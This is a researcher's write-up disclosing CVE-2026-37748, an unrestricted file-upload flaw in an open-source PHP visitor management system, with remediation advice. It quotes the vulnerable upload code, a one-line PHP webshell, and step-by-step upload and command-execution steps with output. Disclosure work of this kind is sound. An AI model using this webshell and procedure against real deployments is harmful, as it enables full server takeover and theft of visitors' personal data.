Introduction

My name is Varad AP Mene, an independent security researcher and bug hunter from India. Over the past few years I have been actively hunting vulnerabilities across the web and have successfully secured 100+ organizations including tech giants like NVIDIA, NASA, and many more through responsible disclosure.

Along with bug bounty hunting, I also research open source web applications for CVE discoveries. This is my second CVE that I am actively publishing and it is the most impactful one so far. Remote Code Execution means full server compromise.

This vulnerability allows an authenticated admin to upload a PHP webshell and achieve full Remote Code Execution on the server complete server compromise with just one file upload.

What is a CVE?

A CVE (Common Vulnerabilities and Exposures) is a unique identifier assigned to a publicly known security vulnerability. CVEs are managed by MITRE and published on the National Vulnerability Database (NVD). Having a CVE assigned to your name means you discovered a real, verified security vulnerability that affects real users and systems.

The Target

Product: Visitor Management System v1.0 Vendor: sanjay1313 URL: https://github.com/sanjay1313/Visitor-Management-System

Visitor Management System is a PHP/MySQL web application used by organizations to manage visitor records. It handles sensitive data like visitor names, contact details, and visit history.

How I Found It

I was auditing open source PHP web applications looking for common vulnerabilities. I downloaded the Visitor Management System and started reviewing the source code manually.

The first thing I always look for in any web application is file upload functionality — it is one of the most dangerous features if implemented incorrectly.

I found two files with upload functionality:

vms/php/admin_user_insert.php   ← Add new admin user
vms/php/update_1.php            ← Update admin user

Inside both files I found this code:

$image = $_FILES['image']['name'];
$tmp = $_FILES['image']['tmp_name'];
move_uploaded_file($tmp, "../images/" . $image);

Three lines. Zero validation. No MIME type check. No extension check. No content verification. The file is saved directly with its original name.

Understanding the Vulnerability

When a file upload has no validation, an attacker can upload any file type — including PHP scripts. PHP scripts uploaded to a web-accessible directory can be executed by simply visiting their URL in a browser.

Normal intended flow:

Admin uploads profile photo → JPEG saved → shown in UI

Attack flow:

Admin uploads shell.php → PHP file saved → 
visited via URL → arbitrary commands executed

Why is this dangerous?

When a PHP webshell is uploaded and executed, the attacker can run any command on the server as the web server user (typically www-data on Linux). This means:

  • Read any file on the server
  • Write files anywhere the web server has permission
  • Delete files
  • Pivot to other internal systems
  • Exfiltrate all database credentials
  • Steal all visitor data

This is why Remote Code Execution is considered the highest severity class of web vulnerability.

Setting Up the Lab

I set up a Docker lab to safely test the vulnerability. Never test on production systems — always use a local lab.

Confirming the Exploit

Step 1 — Create a PHP webshell:

<?php system($_GET['cmd']); ?>

Save this as shell.php

Step 2 — Login to admin panel:

URL: http://localhost:8080/vms/
Username: admin
Password: admin (default)

Step 3 — Upload shell.php as profile photo:

Navigate to: Admin Users → Add New Admin
Upload shell.php as the profile image field
Submit the form

Step 4 — Execute commands:

http://localhost:8080/vms/images/shell.php?cmd=id

Result:

uid=33(www-data) gid=33(www-data) groups=33(www-data)

Full Remote Code Execution confirmed!

Impact Analysis

This vulnerability affects any organization using Visitor Management System 1.0. The impact includes:

Confidentiality: All visitor records, admin credentials, and database contents can be read.

Integrity: An attacker can modify or delete any data on the server.

Availability: The entire server can be taken offline or ransomware can be deployed.

The CVSS score reflects this severity with a High rating of 7.2 due to the requirement of admin authentication.

Proof of Concept Script

I wrote a Python script to automate and demonstrate the exploit:

The full PoC script is available at: https://github.com/menevarad007/CVE-2026-37748

Reporting the Vulnerability

After confirming the vulnerability, I followed responsible disclosure:

  1. Submitted to MITRE via https://cveform.mitre.org
  2. Waited for CVE assignment — received CVE-2026–37748
  3. Created public advisory at https://github.com/menevarad007/CVE-2026-37748
  4. Notified the vendor via GitHub Issues
  5. Notified MITRE about publication

CVE Details

Lessons Learned

  1. Always check file upload functionality first — it is the most dangerous feature
  2. Never trust file extensions — validate MIME type using finfo_file()
  3. Always rename uploaded files — never use the original filename
  4. Store uploads outside webroot — or block PHP execution in upload directory
  5. Responsible disclosure protects everyone — report before publishing

What's Next

This is my second actively published CVE.

My CVE portfolio so far: CVE-2026–37748 — File Upload RCE ← This one CVE-2026–37749 — SQL Injection Auth Bypass

All discovered in just 4 weeks of research.

References

Varad AP Mene — Independent Security Researcher

Email: menevarad007@gmail.com

GitHub: https://github.com/menevarad007